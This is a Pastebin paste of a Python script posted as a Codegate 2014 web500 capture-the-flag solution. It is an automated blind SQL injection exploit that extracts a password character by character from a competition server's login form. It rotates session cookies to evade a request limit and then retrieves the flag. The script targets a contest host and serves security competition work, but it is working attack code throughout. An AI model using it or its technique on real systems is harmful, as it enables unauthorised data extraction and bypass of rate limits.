daily pastebin goal
84%
SHARE
TWEET

codegate@2014- web500 writetup

a guest Feb 25th, 2014 453 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python
  2. #Blind SQL injection Exploit version 1.0
  3. #Language: Python (2.6)
  4. #Author: gamma95
  5.  
  6. import os
  7. import sys
  8. import urllib2
  9. import struct
  10. import urllib
  11. import time
  12. print """
  13.    Codegate@2014: web500 writeup
  14.    https://twitter.com/xchym
  15.    Usage: python web500.py "http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/index.php" "password" "mysql"
  16. """
  17. if len(sys.argv) != 4:
  18.     print "[+] Syntax Error"
  19.     exit()
  20. url = sys.argv[1]
  21. sql = sys.argv[2]
  22. sqlserver = sys.argv[3]
  23.  
  24. def _gen_new_session():
  25.     usock = urllib2.urlopen('http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/')
  26.     _cookie = usock.info().get('Set-Cookie')
  27.     return _cookie
  28.  
  29. def _get_flag(_session, _password):
  30.     url = 'http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/auth.php'
  31.     user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'
  32.     values = {'password':_password}
  33.     headers = { 'User-Agent' : user_agent, 'Cookie': _session }
  34.     data = urllib.urlencode(values)
  35.     req = urllib2.Request(url, data, headers)
  36.     response = urllib2.urlopen(req)
  37.     the_page = response.read()
  38.     return the_page
  39.    
  40. def encodeurl(string):
  41.     return string.replace(' ','%20')
  42.    
  43. def execute(url, sql, sqlserver):
  44.     _list_session=[]
  45.     for line in xrange(0, 40):
  46.         _list_session.append(_gen_new_session())
  47.     lenght = 9999
  48.     if sqlserver =='mysql':
  49.         str1 = " OR 1=1 AND MID("
  50.     else:
  51.         print "[+] argv[4] = mssql or mysql !!! Plz check your input"
  52.         exit()
  53.     result = ""
  54.     dic = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '$', '.','-','_','(',')','[',']','{','}','@','=','/','\\','|','#','?','!','<','>']
  55.     count = 0
  56.     check = 0
  57.     for i in range(1, 31):
  58.         user_agent = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20071008 Ubuntu/7.10 (gutsy) Firefox/2.0.0.6'
  59.         kount = 0
  60.         if check == 1:
  61.             break
  62.         for line in dic:
  63.             kount = kount + 1
  64.             flag = 0
  65.             str2 = "," + str(i)+ ")=" + "'" + result + line + "'"
  66.             chuoi = str1 + sql +','+ "1" + str2 + " and '1"
  67.             print chuoi
  68.             values={'password':"123' "+ chuoi}
  69.             data = urllib.urlencode(values)
  70.             #switch to another session for continue bruteforce searching, if not, may be the password will be deleted (over 120 requests limit check)
  71.             headers = { 'Host': '58.229.183.24','User-Agent': user_agent, 'Referer' : url, 'Cookie': _list_session[count]}
  72.             req = urllib2.Request(url, data, headers)
  73.             try:
  74.                 response = urllib2.urlopen(req)
  75.             except:
  76.                 print "[+] Connection error"
  77.                 exit()
  78.             page = response.read()
  79.             len1 = len(page)
  80.             if "True" in page:
  81.                 count = count + 1
  82.                 result = result + line
  83.                 print result
  84.                 flag = 1
  85.                 break #
  86.             elif kount == len(dic):
  87.                 check = 1
  88.                 break
  89.             else:
  90.                 continue
  91.     print "[+]Done, The password is: " + str(result)
  92.     print "[+]Flag: " + _get_flag(_list_session[count], str(result))
  93.     ##############
  94.  
  95. if True:
  96.    
  97.     print """
  98.    [+] Sending Malicious Request
  99.    [+] Plz wait ... :)
  100.                """
  101.                
  102.     execute(url, sql, sqlserver)
  103. else:
  104.     print "Not vul"
  105.     exit()
  106. exit()
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top